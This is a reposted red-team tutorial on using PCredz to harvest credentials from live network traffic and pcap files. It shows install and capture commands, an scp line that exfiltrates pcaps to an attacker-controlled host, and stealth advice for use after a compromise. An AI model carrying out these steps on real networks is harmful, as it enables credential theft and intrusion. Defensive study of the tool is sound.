National Cyber Warfare Foundation (NCWF)

Password Cracking: Stealing Credentials with PCredz


0 user ratings
2026-01-02 14:34:52
milo
Red Team (CNA)
PCredz can pull credentials and other sensitive data from network captures, helping you spot weak authentication flows

Welcome back, aspiring cyberwarriors!





Today we are going through another tool that can really help you during your red team engagements. It is called PCredz. PCredz is a powerful credential extraction tool that focuses on pulling sensitive information out of network traffic. According to the project documentation, PCredz can extract credit card numbers, NTLM credentials, Kerberos hashes, HTTP authentication data, SNMP community strings, POP, SMTP, FTP, IMAP and much more from a pcap file or from a live interface. It supports both IPv4 and IPv6. All discovered hashes are shown in formats that work directly with hashcat. For example you can use mode 7500 for Kerberos, 5500 for NTLMv1 and 5600 for NTLMv2. The tool also logs everything into a CredentialDump file and makes it organized so that you can feed it directly into cracking workflows.





showing the log file of pcredz




In practice this means that if credentials are traversing the network in any recoverable form, PCredz will collect them for you.





Use Cases





So when would you actually use PCredz during a red team engagement?





Imagine you have already gained a foothold somewhere inside a network. At this point, one of your goals is usually to move laterally, escalate privileges, and gain access to more sensitive resources. Network traffic is often full of interesting secrets, especially in environments where encryption is not enforced or where legacy protocols still exist. PCredz becomes very useful when you want to analyze captured pcaps or when you want to quietly listen to live traffic flowing through an interface. If users are authenticating to file shares, web interfaces, legacy applications, email systems or network services, you may see usable credentials. This is particularly realistic on older networks or mixed environments where not everything runs over HTTPS or modern authentication.





Blue teams also use PCredz during compromise assessments to detect insecure authentication flows inside their network. But during red team work, it helps you move further and more silently than noisy active attacks.





Setting Up





There are two main ways to run PCredz. You can run it inside Docker or directly through the Linux console. For this demonstration we will use the console. When you are working on a compromised or fragile machine, you must be careful not to break anything. Many times you will land on an old production server that the business still depends on. For both operational security and stability reasons, it is safer to isolate your tooling. A great way to do that is to create a separate Python 3 virtual environment just for PCredz.





Here is how you create a separate python3 environment and activate it:





bash# > python3 -m venv pcredz; source pcredz/bin/activate





Next we install the dependencies:





bash# > apt install python3-pip && sudo apt install libpcap-dev && sudo apt install file && pip3 install Cython && pip3 install python-libpcap





setting up the python environment for pcredz to work




Now we are ready to get started.





Live Capture vs PCAPs





We are going to look at PCredz in two ways. First we will use live capture mode so the tool listens directly to the network interface. Then we will see how it works with captured pcaps. Working with pcaps is often more convenient, especially if the system is extremely old or restricted and does not allow you to install dependencies. The tool will automatically parse your files and extract any available credentials.





Live





To run the tool in live mode and capture credentials, use:





bash# > python3 ./Pcredz -i eth0 -v





capturing ntlmv2 credentials live with pcredz




You can see the name of your network interfaces by running ifconfig. Sometimes you will find several interfaces and you will need to choose the correct one. To reduce noise, try selecting interfaces that sit on private IP ranges. Otherwise you may end up with captures full of random internet scanning traffic. Many automated scripts constantly probe IP ranges looking for weak targets and this junk traffic can pollute your pcaps making them heavier than needed.





choosing the right network interface for pcredz




PCAPs





If you decide to work offline with pcaps, the first step is usually to exfiltrate the captured files to a machine you control. For example, you can transfer the file to a VPS using scp:





bash#  > scp file.pcap root@IP:/tmp





exfiltrating pcap files with scp to a controlled server to analyze with pcredz




Once the upload is complete, the file will keep its original name and will be located in the specified directory on the remote machine.





Then you can run PCredz in offline mode like this when analyzing a single file:





bash# > python3 ./Pcredz -f file.pcap





Or when analyzing an entire directory of pcaps:





bash# > python3 ./Pcredz -d /tmp/pcap-directory-to-parse/





parsing pcap files and extracting ntlmv2 hashes from them




This approach is especially nice when you want to stay quiet. You collect traffic with tcpdump, move the files out and only analyze them on your own system.





Summary





PCredz is a simple tool. You can gather credentials without interrupting production systems or triggering noisy authentication attacks like relays. A very stealthy approach during a red team engagement is to capture network traffic with tcpdump, exfiltrate the pcaps to your controlled machine, and then run PCredz there. The tool becomes especially effective if you manage to compromise a file server or another system that many Windows machines depend on. These machines constantly receive authentication traffic from users, which means you will likely capture something valuable sooner or later. Once you obtain valid credentials, many new doors open. You may escalate privileges, dump LSASS, schedule malicious certificate requests, or impersonate privileged accounts through legitimate mechanisms. Quite often you will even see HTTP traffic in cleartext reusing the same Active Directory credentials across multiple services. Credential reuse is still very common in the real world.



Source: HackersArise
Source Link: https://hackers-arise.com/password-cracking-stealing-credentials-with-pcredz/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Red Team (CNA)



Copyright 2012 through 2026 - National Cyber Warfare Foundation - All rights reserved worldwide.